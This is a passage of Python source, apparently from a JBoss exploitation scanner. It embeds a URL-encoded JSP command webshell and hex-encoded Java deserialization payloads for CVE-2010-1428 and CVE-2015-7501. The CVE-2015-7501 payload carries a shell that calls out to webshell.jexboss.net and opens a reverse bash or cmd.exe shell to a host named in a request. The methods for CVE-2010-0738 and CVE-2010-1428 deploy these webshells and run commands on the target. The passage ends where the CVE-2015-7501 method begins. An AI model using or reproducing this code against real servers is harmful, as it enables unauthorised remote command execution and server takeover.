'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36'
}
self.jsp_webshell = ("%3c%25%40%20%70%61%67%65%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61%22%20%69%6d%70"
"%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%20%70%61%67%65%45%6e"
"%63%6f%64%69%6e%67%3d%22%55%54%46%2d%38%22%25%3e%3c%25%21%70%75%62%6c%69%63%20%73%74%61%74%69%63%20%53"
"%74%72%69%6e%67%20%65%78%63%75%74%65%43%6d%64%28%53%74%72%69%6e%67%20%63%29%20%7b%53%74%72%69%6e%67%42"
"%75%69%6c%64%65%72%20%6c%69%6e%65%20%3d%20%6e%65%77%20%53%74%72%69%6e%67%42%75%69%6c%64%65%72%28%29%3b"
"%74%72%79%20%7b%50%72%6f%63%65%73%73%20%70%72%6f%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74"
"%69%6d%65%28%29%2e%65%78%65%63%28%63%29%3b%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%75%66%20%3d"
"%20%6e%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%49%6e%70%75%74%53%74%72%65%61"
"%6d%52%65%61%64%65%72%28%70%72%6f%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%53%74%72"
"%69%6e%67%20%74%65%6d%70%20%3d%20%6e%75%6c%6c%3b%77%68%69%6c%65%20%28%28%74%65%6d%70%20%3d%20%62%75%66"
"%2e%72%65%61%64%4c%69%6e%65%28%29%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%6c%69%6e%65%2e%61%70%70%65%6e%64"
"%28%74%65%6d%70%2b%22%5c%5c%6e%22%29%3b%7d%62%75%66%2e%63%6c%6f%73%65%28%29%3b%7d%20%63%61%74%63%68%20"
"%28%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%6c%69%6e%65%2e%61%70%70%65%6e%64%28%65%2e%67%65%74%4d%65"
"%73%73%61%67%65%28%29%29%3b%7d%72%65%74%75%72%6e%20%6c%69%6e%65%2e%74%6f%53%74%72%69%6e%67%28%29%3b%7d"
"%25%3e%3c%25%69%66%28%22%70%61%73%73%77%6f%72%64%22%2e%65%71%75%61%6c%73%28%72%65%71%75%65%73%74%2e%67"
"%65%74%50%61%72%61%6d%65%74%65%72%28%22%70%77%64%22%29%29%26%26%21%22%22%2e%65%71%75%61%6c%73%28%72%65"
"%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6d%64%22%29%29%29%7b%6f%75%74%2e%70%72"
"%69%6e%74%6c%6e%28%22%3c%70%72%65%3e%22%2b%65%78%63%75%74%65%43%6d%64%28%72%65%71%75%65%73%74%2e%67%65"
"%74%50%61%72%61%6d%65%74%65%72%28%22%63%6d%64%22%29%29%2b%22%3c%2f%70%72%65%3e%22%29%3b%7d%65%6c%73%65"
"%7b%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%3a%2d%29%22%29%3b%7d%25%3e")
self.payload_cve_2010_1428 = (
"\xAC\xED\x00\x05\x73\x72\x00\x2E\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x63\x6F\x6E\x73\x6F"
"\x6C\x65\x2E\x72\x65\x6D\x6F\x74\x65\x2E\x52\x65\x6D\x6F\x74\x65\x4D\x42\x65\x61\x6E\x49\x6E\x76"
"\x6F\x63\x61\x74\x69\x6F\x6E\xE0\x4F\xA3\x7A\x74\xAE\x8D\xFA\x02\x00\x04\x4C\x00\x0A\x61\x63\x74"
"\x69\x6F\x6E\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72"
"\x69\x6E\x67\x3B\x5B\x00\x06\x70\x61\x72\x61\x6D\x73\x74\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C"
"\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x5B\x00\x09\x73\x69\x67\x6E\x61\x74\x75\x72\x65\x74"
"\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x4C\x00\x10"
"\x74\x61\x72\x67\x65\x74\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x74\x00\x1D\x4C\x6A\x61\x76\x61"
"\x78\x2F\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2F\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x3B"
"\x78\x70\x74\x00\x06\x64\x65\x70\x6C\x6F\x79\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61"
"\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00"
"\x00\x00\x01\x73\x72\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x96\x25\x37\x36\x1A"
"\xFC\xE4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6F\x64\x65\x49\x00\x04\x70\x6F\x72\x74"
"\x4C\x00\x09\x61\x75\x74\x68\x6F\x72\x69\x74\x79\x71\x00\x7E\x00\x01\x4C\x00\x04\x66\x69\x6C\x65"
"\x71\x00\x7E\x00\x01\x4C\x00\x04\x68\x6F\x73\x74\x71\x00\x7E\x00\x01\x4C\x00\x08\x70\x72\x6F\x74"
"\x6F\x63\x6F\x6C\x71\x00\x7E\x00\x01\x4C\x00\x03\x72\x65\x66\x71\x00\x7E\x00\x01\x78\x70\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\x74\x00\x0E\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66\x2E\x63\x6F\x6D\x74"
"\x00\x0F\x2F\x72\x6E\x70\x2F\x6A\x65\x78\x77\x73\x34\x2E\x77\x61\x72\x71\x00\x7E\x00\x0B\x74\x00"
"\x04\x68\x74\x74\x70\x70\x78\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53"
"\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74"
"\x00\x0C\x6A\x61\x76\x61\x2E\x6E\x65\x74\x2E\x55\x52\x4C\x73\x72\x00\x1B\x6A\x61\x76\x61\x78\x2E"
"\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65\x0F\x03\xA7"
"\x1B\xEB\x6D\x15\xCF\x03\x00\x00\x78\x70\x74\x00\x21\x6A\x62\x6F\x73\x73\x2E\x73\x79\x73\x74\x65"
"\x6D\x3A\x73\x65\x72\x76\x69\x63\x65\x3D\x4D\x61\x69\x6E\x44\x65\x70\x6C\x6F\x79\x65\x72\x78")
self.payload_cve_2015_7501 = (
"\xAC\xED\x00\x05\x73\x72\x00\x29\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76\x6F\x63"
"\x61\x74\x69\x6F\x6E\x2E\x4D\x61\x72\x73\x68\x61\x6C\x6C\x65\x64\x49\x6E\x76\x6F\x63\x61\x74\x69"
"\x6F\x6E\xF6\x06\x95\x27\x41\x3E\xA4\xBE\x0C\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xC1\xD0"
"\x53\x87\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12"
"\xE2\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65\x78\x72\x00\x10\x6A\x61"
"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00"
"\x00\x78\x70\xE3\x2C\x60\xE6\x73\x72\x00\x24\x6F\x72\x67\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76"
"\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x4D\x61\x72\x73\x68\x61\x6C\x6C\x65\x64\x56\x61\x6C\x75\x65\xEA"
"\xCC\xE0\xD1\xF4\x4A\xD0\x99\x0C\x00\x00\x78\x70\x7A\x00\x00\x04\x00\x00\x00\x09\xD3\xAC\xED\x00"
"\x05\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B"
"\x90\xCE\x58\x9F\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1B\x6A\x61\x76"
"\x61\x78\x2E\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x4F\x62\x6A\x65\x63\x74\x4E\x61\x6D\x65"
"\x0F\x03\xA7\x1B\xEB\x6D\x15\xCF\x03\x00\x00\x78\x70\x74\x00\x2C\x6A\x62\x6F\x73\x73\x2E\x61\x64"
"\x6D\x69\x6E\x3A\x73\x65\x72\x76\x69\x63\x65\x3D\x44\x65\x70\x6C\x6F\x79\x6D\x65\x6E\x74\x46\x69"
"\x6C\x65\x52\x65\x70\x6F\x73\x69\x74\x6F\x72\x79\x78\x74\x00\x05\x73\x74\x6F\x72\x65\x75\x71\x00"
"\x7E\x00\x00\x00\x00\x00\x05\x74\x00\x0B\x6A\x65\x78\x69\x6E\x76\x34\x2E\x77\x61\x72\x74\x00\x07"
"\x6A\x65\x78\x69\x6E\x76\x34\x74\x00\x04\x2E\x6A\x73\x70\x74\x08\x98\x3C\x25\x40\x20\x70\x61\x67"
"\x65\x20\x69\x6D\x70\x6F\x72\x74\x3D\x22\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x2A\x2C\x6A\x61"
"\x76\x61\x2E\x75\x74\x69\x6C\x2E\x2A\x2C\x6A\x61\x76\x61\x2E\x69\x6F\x2E\x2A\x2C\x6A\x61\x76\x61"
"\x2E\x6E\x65\x74\x2E\x2A\x22\x20\x70\x61\x67\x65\x45\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x55\x54"
"\x46\x2D\x38\x22\x25\x3E\x20\x3C\x70\x72\x65\x3E\x20\x3C\x25\x20\x63\x6C\x61\x73\x73\x20\x72\x76"
"\x20\x65\x78\x74\x65\x6E\x64\x73\x20\x54\x68\x72\x65\x61\x64\x7B\x49\x6E\x70\x75\x74\x53\x74\x72"
"\x65\x61\x6D\x20\x69\x73\x3B\x4F\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x20\x6F\x73\x3B\x72"
"\x76\x28\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x20\x69\x73\x2C\x4F\x75\x74\x70\x75\x74\x53"
"\x74\x72\x65\x61\x6D\x20\x6F\x73\x29\x7B\x74\x68\x69\x73\x2E\x69\x73\x3D\x69\x73\x3B\x74\x68\x69"
"\x73\x2E\x6F\x73\x3D\x6F\x73\x3B\x7D\x70\x75\x62\x6C\x69\x63\x20\x76\x6F\x69\x64\x20\x72\x75\x6E"
"\x28\x29\x7B\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x69\x6E\x3D\x6E\x75\x6C"
"\x6C\x3B\x42\x75\x66\x66\x65\x72\x65\x64\x57\x72\x69\x74\x65\x72\x20\x6F\x75\x74\x3D\x6E\x75\x6C"
"\x6C\x3B\x74\x72\x79\x7B\x69\x6E\x3D\x6E\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61"
"\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65"
"\x72\x28\x74\x68\x69\x73\x2E\x69\x73\x29\x29\x3B\x6F\x75\x74\x3D\x6E\x65\x77\x20\x42\x75\x66\x66"
"\x65\x72\x65\x64\x57\x72\x69\x74\x65\x72\x28\x6E\x65\x77\x20\x4F\x75\x74\x70\x75\x74\x53\x74\x72"
"\x65\x61\x6D\x57\x72\x69\x74\x65\x72\x28\x74\x68\x69\x73\x2E\x6F\x73\x29\x29\x3B\x63\x68\x61\x72"
"\x20\x62\x5B\x5D\x3D\x6E\x65\x77\x20\x63\x68\x61\x72\x5B\x38\x31\x39\x32\x5D\x3B\x69\x6E\x74\x20"
"\x6C\x3B\x77\x68\x69\x6C\x65\x28\x28\x6C\x3D\x69\x6E\x2E\x72\x65\x61\x64\x28\x62\x2C\x30\x2C\x62"
"\x2E\x6C\x65\x6E\x67\x74\x68\x29\x29\x3E\x30\x29\x7B\x6F\x75\x74\x2E\x77\x72\x69\x74\x65\x28\x62"
"\x2C\x30\x2C\x6C\x29\x3B\x6F\x75\x74\x2E\x66\x6C\x75\x73\x68\x28\x29\x3B\x7D\x7D\x63\x61\x74\x63"
"\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x20\x65\x29\x7B\x7D\x7D\x7D\x53\x74\x72\x69\x6E\x67"
"\x20\x73\x68\x3D\x6E\x75\x6C\x6C\x3B\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x50"
"\x61\x72\x61\x6D\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x21\x3D\x6E\x75\x6C\x6C\x29\x7B\x73"
"\x68\x3D\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x50\x61\x72\x61\x6D\x65\x74\x65\x72\x28\x22"
"\x70\x70\x70\x22\x29\x3B\x7D\x65\x6C\x73\x65\x20\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2E\x67"
"\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x58\x2D\x4A\x45\x58\x22\x29\x21\x3D\x20\x6E\x75\x6C\x6C"
"\x29\x7B\x73\x68\x3D\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22"
"\x58\x2D\x4A\x45\x58\x22\x29\x3B\x7D\x69\x66\x28\x73\x68\x20\x21\x3D\x20\x6E\x75\x6C\x6C\x29\x7B"
"\x72\x65\x73\x70\x6F\x6E\x73\x65\x2E\x73\x65\x74\x43\x6F\x6E\x74\x65\x6E\x74\x54\x79\x70\x65\x28"
"\x22\x74\x65\x78\x74\x2F\x68\x74\x6D\x6C\x22\x29\x3B\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61"
"\x64\x65\x72\x20\x62\x72\x3D\x6E\x75\x6C\x6C\x3B\x53\x74\x72\x69\x6E\x67\x20\x6C\x68\x63\x3D\x28"
"\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2E\x74\x6F\x53\x74\x72\x69\x6E\x67\x28\x29\x2E\x73\x70"
"\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x30\x5D\x2B\x22\x68\x2E\x6C\x6F\x67\x22\x29\x2E\x72\x65\x70"
"\x6C\x61\x63\x65\x41\x6C\x6C\x28\x22\x20\x22\x2C\x22\x2D\x22\x29\x3B\x74\x72\x79\x7B\x69\x66\x28"
"\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x7A\x00\x00\x04\x00\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22"
"\x6E\x6F\x2D\x63\x68\x65\x63\x6B\x2D\x75\x70\x64\x61\x74\x65\x73\x22\x29\x3D\x3D\x6E\x75\x6C\x6C"
"\x29\x7B\x48\x74\x74\x70\x55\x52\x4C\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x20\x63\x3D\x28\x48"
"\x74\x74\x70\x55\x52\x4C\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x29\x6E\x65\x77\x20\x55\x52\x4C"
"\x28\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x65\x62\x73\x68\x65\x6C\x6C\x2E\x6A\x65\x78\x62\x6F\x73"
"\x73\x2E\x6E\x65\x74\x2F\x6A\x73\x70\x5F\x76\x65\x72\x73\x69\x6F\x6E\x2E\x74\x78\x74\x22\x29\x2E"
"\x6F\x70\x65\x6E\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x28\x29\x3B\x63\x2E\x73\x65\x74\x52\x65"
"\x71\x75\x65\x73\x74\x50\x72\x6F\x70\x65\x72\x74\x79\x28\x22\x55\x73\x65\x72\x2D\x41\x67\x65\x6E"
"\x74\x22\x2C\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6F"
"\x73\x74\x22\x29\x2B\x22\x3C\x2D\x22\x2B\x72\x65\x71\x75\x65\x73\x74\x2E\x67\x65\x74\x52\x65\x6D"
"\x6F\x74\x65\x41\x64\x64\x72\x28\x29\x29\x3B\x69\x66\x28\x21\x6E\x65\x77\x20\x46\x69\x6C\x65\x28"
"\x22\x63\x68\x65\x63\x6B\x5F\x22\x2B\x6C\x68\x63\x29\x2E\x65\x78\x69\x73\x74\x73\x28\x29\x29\x7B"
"\x50\x72\x69\x6E\x74\x57\x72\x69\x74\x65\x72\x20\x77\x3D\x6E\x65\x77\x20\x50\x72\x69\x6E\x74\x57"
"\x72\x69\x74\x65\x72\x28\x22\x63\x68\x65\x63\x6B\x5F\x22\x2B\x6C\x68\x63\x29\x3B\x77\x2E\x63\x6C"
"\x6F\x73\x65\x28\x29\x3B\x62\x72\x3D\x6E\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61"
"\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65"
"\x72\x28\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x3B\x53"
"\x74\x72\x69\x6E\x67\x20\x6C\x76\x3D\x62\x72\x2E\x72\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x2E\x73"
"\x70\x6C\x69\x74\x28\x22\x20\x22\x29\x5B\x31\x5D\x3B\x69\x66\x28\x21\x6C\x76\x2E\x65\x71\x75\x61"
"\x6C\x73\x28\x22\x34\x22\x29\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x28\x22\x4E\x65\x77\x20"
"\x76\x65\x72\x73\x69\x6F\x6E\x2E\x20\x50\x6C\x65\x61\x73\x65\x20\x75\x70\x64\x61\x74\x65\x21\x22"
"\x29\x3B\x7D\x7D\x65\x6C\x73\x65\x20\x69\x66\x28\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22"
"\x69\x64\x22\x29\x21\x3D\x2D\x31\x7C\x7C\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22\x69\x70"
"\x63\x6F\x6E\x66\x69\x67\x22\x29\x21\x3D\x2D\x31\x29\x7B\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74"
"\x53\x74\x72\x65\x61\x6D\x28\x29\x3B\x7D\x7D\x7D\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70\x74"
"\x69\x6F\x6E\x20\x65\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x22\x46\x61\x69\x6C"
"\x65\x64\x20\x74\x6F\x20\x63\x68\x65\x63\x6B\x20\x66\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x73\x22"
"\x29\x3B\x7D\x74\x72\x79\x7B\x50\x72\x6F\x63\x65\x73\x73\x20\x70\x3B\x62\x6F\x6F\x6C\x65\x61\x6E"
"\x20\x6E\x69\x78\x3D\x74\x72\x75\x65\x3B\x69\x66\x28\x21\x53\x79\x73\x74\x65\x6D\x2E\x67\x65\x74"
"\x50\x72\x6F\x70\x65\x72\x74\x79\x28\x22\x66\x69\x6C\x65\x2E\x73\x65\x70\x61\x72\x61\x74\x6F\x72"
"\x22\x29\x2E\x65\x71\x75\x61\x6C\x73\x28\x22\x2F\x22\x29\x29\x7B\x6E\x69\x78\x3D\x66\x61\x6C\x73"
"\x65\x3B\x7D\x69\x66\x28\x73\x68\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x22\x6A\x65\x78\x72\x65\x6D"
"\x6F\x74\x65\x3D\x22\x29\x21\x3D\x2D\x31\x29\x7B\x53\x6F\x63\x6B\x65\x74\x20\x73\x63\x3D\x6E\x65"
"\x77\x20\x53\x6F\x63\x6B\x65\x74\x28\x73\x68\x2E\x73\x70\x6C\x69\x74\x28\x22\x3D\x22\x29\x5B\x31"
"\x5D\x2E\x73\x70\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x30\x5D\x2C\x49\x6E\x74\x65\x67\x65\x72\x2E"
"\x70\x61\x72\x73\x65\x49\x6E\x74\x28\x73\x68\x2E\x73\x70\x6C\x69\x74\x28\x22\x3A\x22\x29\x5B\x31"
"\x5D\x29\x29\x3B\x69\x66\x28\x6E\x69\x78\x29\x7B\x73\x68\x3D\x22\x2F\x62\x69\x6E\x2F\x62\x61\x73"
"\x68\x22\x3B\x7D\x65\x6C\x73\x65\x7B\x73\x68\x3D\x22\x63\x6D\x64\x2E\x65\x78\x65\x22\x3B\x7D\x70"
"\x3D\x52\x75\x6E\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78"
"\x65\x63\x28\x73\x68\x29\x3B\x28\x6E\x65\x77\x20\x72\x76\x28\x70\x2E\x67\x65\x74\x49\x6E\x70\x75"
"\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x2C\x73\x63\x2E\x67\x65\x74\x4F\x75\x74\x70\x75\x74\x53\x74"
"\x72\x65\x61\x6D\x28\x29\x29\x29\x2E\x73\x74\x61\x72\x74\x28\x29\x3B\x28\x6E\x65\x77\x20\x72\x76"
"\x28\x73\x63\x2E\x67\x65\x74\x49\x6E\x70\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x2C\x70\x2E\x67"
"\x65\x74\x4F\x75\x74\x70\x7A\x00\x00\x01\xDB\x75\x74\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x2E"
"\x73\x74\x61\x72\x74\x28\x29\x3B\x7D\x65\x6C\x73\x65\x7B\x69\x66\x28\x6E\x69\x78\x29\x7B\x70\x3D"
"\x52\x75\x6E\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78\x65"
"\x63\x28\x6E\x65\x77\x20\x53\x74\x72\x69\x6E\x67\x5B\x5D\x7B\x22\x2F\x62\x69\x6E\x2F\x62\x61\x73"
"\x68\x22\x2C\x22\x2D\x63\x22\x2C\x73\x68\x7D\x29\x3B\x7D\x65\x6C\x73\x65\x7B\x70\x3D\x52\x75\x6E"
"\x74\x69\x6D\x65\x2E\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x28\x29\x2E\x65\x78\x65\x63\x28\x22"
"\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x43\x20\x22\x2B\x73\x68\x29\x3B\x7D\x62\x72\x3D\x6E\x65\x77"
"\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6E\x65\x77\x20\x49\x6E\x70\x75"
"\x74\x53\x74\x72\x65\x61\x6D\x52\x65\x61\x64\x65\x72\x28\x70\x2E\x67\x65\x74\x49\x6E\x70\x75\x74"
"\x53\x74\x72\x65\x61\x6D\x28\x29\x29\x29\x3B\x53\x74\x72\x69\x6E\x67\x20\x64\x3D\x62\x72\x2E\x72"
"\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x3B\x77\x68\x69\x6C\x65\x28\x64\x20\x21\x3D\x20\x6E\x75\x6C"
"\x6C\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x64\x29\x3B\x64\x3D\x62\x72\x2E\x72"
"\x65\x61\x64\x4C\x69\x6E\x65\x28\x29\x3B\x7D\x7D\x7D\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70"
"\x74\x69\x6F\x6E\x20\x65\x29\x7B\x6F\x75\x74\x2E\x70\x72\x69\x6E\x74\x6C\x6E\x28\x22\x55\x6E\x6B"
"\x6E\x6F\x77\x6E\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x22\x29\x3B\x7D\x7D\x25\x3E\x73\x72\x00\x11\x6A"
"\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x42\x6F\x6F\x6C\x65\x61\x6E\xCD\x20\x72\x80\xD5\x9C\xFA\xEE"
"\x02\x00\x01\x5A\x00\x05\x76\x61\x6C\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61"
"\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00"
"\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E"
"\x67\x71\x00\x7E\x00\x0F\x71\x00\x7E\x00\x0F\x71\x00\x7E\x00\x0F\x74\x00\x07\x62\x6F\x6F\x6C\x65"
"\x61\x6E\xF9\x12\x63\x17\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6F\x72\x67"
"\x2E\x6A\x62\x6F\x73\x73\x2E\x69\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x49\x6E\x76\x6F\x63\x61"
"\x74\x69\x6F\x6E\x4B\x65\x79\xB8\xFB\x72\x84\xD7\x93\x85\xF9\x02\x00\x01\x49\x00\x07\x6F\x72\x64"
"\x69\x6E\x61\x6C\x78\x70\x00\x00\x00\x04\x70\x78")
# 2020-09-23
def cve_2010_0738(self):
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.1'
self.pocname = "RedHat JBoss: CVE-2010-0738"
self.info = CodeTest.Colored_.de() + " [jmx-console]"
self.path = "/jmx-console/HtmlAdaptor"
self.rawdata = "null"
self.r = "PoCWating"
self.method = "head"
self.data = ":-)"
self.poc = ("?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName="
"store&argType=java.lang.String&arg0=shells.war&argType=java.lang.String&arg1=shells&argType=java"
".lang.String&arg2=.jsp&argType=java.lang.String&arg3=" + self.data + "&argType=boolean&arg4=True")
self.exp = ("?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName="
"store&argType=java.lang.String&arg0=" + self.name + ".war&argType=java.lang.String&arg1="+self.name+"&argType=java"
".lang.String&arg2=.jsp&argType=java.lang.String&arg3=" + self.jsp_webshell + "&argType=boolean&arg4=True")
self.headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive"}
try:
if CodeTest.VULN is None:
self.request = requests.head(self.url + self.path + self.poc , headers=self.headers, timeout=TIMEOUT, verify=False)
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
self.request = requests.get(self.url + "/shells/shells.jsp", headers=self.headers, timeout=TIMEOUT, verify=False)
CodeTest.verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info)
else:
self.request = requests.head(self.url + self.path + self.exp , headers=self.headers, timeout=TIMEOUT, verify=False)
self.jsp = ">>> " + self.url + "/" + self.name + "/" + self.name + ".jsp" + "?pwd=password&cmd=" + CMD
CodeTest.verify.generic_output(self.jsp, self.pocname, self.method, self.rawdata, self.info)
except requests.exceptions.Timeout as error:
CodeTest.verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
CodeTest.verify.connection_output(self.pocname)
except Exception as error:
CodeTest.verify.generic_output(str(error), self.pocname, self.method, self.rawdata, self.info)
# 2020-09-24
def cve_2010_1428(self):
self.pocname = "RedHat JBoss: CVE-2010-1428"
self.info = CodeTest.Colored_.de() + " [web-console]"
self.path = "/web-console/Invoker"
self.rawdata = "null"
self.r = "PoCWating"
self.method = "head"
self.data = ":-)"
try:
if CodeTest.VULN is None:
self.request = requests.post(self.url + self.path, data=self.data, headers=self.headers)
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
if r"WWW-Authenticate" in self.request.headers:
self.r = "PoCSuCCeSS"
CodeTest.verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info)
else:
self.request = requests.head(self.url + self.path, data=self.payload_cve_2010_1428, headers=self.headers, timeout=TIMEOUT, verify=False)
self.cmd = urlencode({"ppp": CMD})
self.request = requests.get(self.url + "/jexws4/jexws4.jsp?" + self.cmd, headers=self.headers, timeout=TIMEOUT, verify=False)
time.sleep(2)
CodeTest.verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info)
except requests.exceptions.Timeout as error:
CodeTest.verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
CodeTest.verify.connection_output(self.pocname)
except Exception as error:
CodeTest.verify.generic_output(str(error), self.pocname, self.method, self.rawdata, self.info)
# 2020-09-23 RedHat JBoss: CVE-2015-7501, JMXInvokerServlet
def cve_2015_7501(self):
self.pocname = "RedHat JBoss: CVE-2015-7501"
self.info = CodeTest.Colored_.de() + " [JMXInvokerServlet]"
self.path = "/invoker/JMXInvokerServlet"
